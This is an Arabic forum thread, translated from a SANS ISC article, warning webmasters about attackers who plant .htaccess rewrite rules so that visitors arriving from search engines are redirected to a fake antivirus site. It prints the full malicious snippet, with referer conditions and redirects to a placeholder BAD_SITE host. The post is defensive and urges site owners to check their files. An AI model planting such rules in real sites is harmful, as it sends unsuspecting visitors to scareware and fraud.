مشكور جدا على هذه المعلومه القيمه
قام الأشخاص السيئون (crackers) باستغلال RewriteEngine في apache بطريقة سيئة لتحويل الزوار إلى مواقع مزورة لمنتجي برامج مكافحة الفيروس. خاصية RewriteEngine يمكن تفعيلها من خلال ملف htaccess لاحظ المثال التالي:
RewriteEngine OnRewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* https://BAD_SITE/in.html?s=hg [R,L]
Errordocument 404 https://BAD_SITE/in.html?s=hg_err
سوف تفعل الخاصية
الجمل الست التي تليها هي شروط إعادة كتابة العنوان.
هذه الجمل تفحص ال HTTP_REFERER وكما هو ظاهر فهي تتضمن بعض أشهر محركات البحث. عند تحقق أي شرط من هذه الشروط سيتم تنفيذ جملة RewriteRule.
كما هو ظاهر من الصيغة أعلاه فهي طريقة خبيثة للغاية حيث أن المستخدم عند زيارته للموقع من خلال عنوان الموقع المباشر فلا شيء سوف يحدث لكن حين زيارته من خلال موقع بحث من المواقع المذكورة في الشروط فسوف يتم تحويل المستخدم إلى الموقع المزور.
لذلك إذا كان لديك موقع يستخدم htaccess (أو حتى لا يستخدمه) فقم بفحصه وتأكد من أنه لم يتم تغييره.
ملاحظة: هذا شرح مترجم لمقالة وردت في موقع isc.sans.org
[CENTER][SIZE="5"][COLOR="Red"]كلّنا ليبيّون[/COLOR][/SIZE][/CENTER]
[CENTER]
[IMG]https://www.arabhardware.net/forum/picture.php?albumid=282&pictureid=1037[/IMG]
[/CENTER]
مشكور جدا على هذه المعلومه القيمه
Knowledge is belong to human
مشكور كتير لك اخي
حيّاكم الله إخواني وجزاكم الله خيراً على مروركم الطيب
[CENTER][SIZE="5"][COLOR="Red"]كلّنا ليبيّون[/COLOR][/SIZE][/CENTER]
[CENTER]
[IMG]https://www.arabhardware.net/forum/picture.php?albumid=282&pictureid=1037[/IMG]
[/CENTER]
المفضلات